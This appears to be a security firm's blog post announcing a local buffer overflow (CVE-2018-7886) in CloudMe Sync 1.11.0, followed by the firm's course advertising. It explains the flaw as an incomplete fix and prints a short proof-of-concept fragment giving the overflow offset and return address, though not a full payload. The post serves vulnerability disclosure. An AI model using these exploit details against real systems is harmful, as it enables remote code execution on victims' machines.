CVE-2018-7886 : CloudMe Sync 1.11.0 – Local Buffer Overflow
CVE-2018-7886 discovered by ICSS team member Prasenjit Kanti Paul who is the Co-Founder of Indian Cyber Security Solutions. The Exploit is published on Exploit DB on 16-04-2018. It’s an achievement for Indian Cyber Security Solutions. The Exploit details are as follows:
Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
Date: 08-03-2018
CVE: CVE-2018-7886
Author: Prasenjit Kanti Paul
Overview:
Previous version CloudMe Sync 1.10.9 is having a RCE [CVE-2018-6892] on TCP port 8888 which can be accessed remotely. So any unauthenticated remote user could cause buffer overflow on port 8888 and execute any arbitrary code of victim’s system.
To prevent RCE in CloudMe Sync 1.10.9 , in CloudMe Sync 1.11.0, it restricted TCP port 8888 to be used locally (127.0.0.1) so only localhost can use this port. So this exploit is a local exploit.
This vulnerability exists because of an incomplete fix for CVE-2018-6892.
Proof Of Concept
Run this file in victim’s win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.
import socket
target=”127.0.0.1″
junk=”A”*1052
eip=”\x7B\x8A\xA9\x68″
After running this PoC on victim’s system, attacker system got the shell
Highest Selling Technical Courses of Indian Cyber Security Solutions:
Amazon Web Services Training in Hyderabad
Amazon Web Services Training in Bangalore
Amazon Web Services Training in Bhubaneswar
Summer Training for CSE, IT, BCA & MCA Students
Network Penetration Testing training
Certified Network Penetration Tester
Diploma in Web Application Security
Certified Web Application Penetration Tester
Certified Android Penetration Tester
Cybersecurity services that can protect your company:
Web Security | Web Penetration Testing
Network Penetration Testing – NPT
Android App Penetration Testing
Other Location for Online Courses:
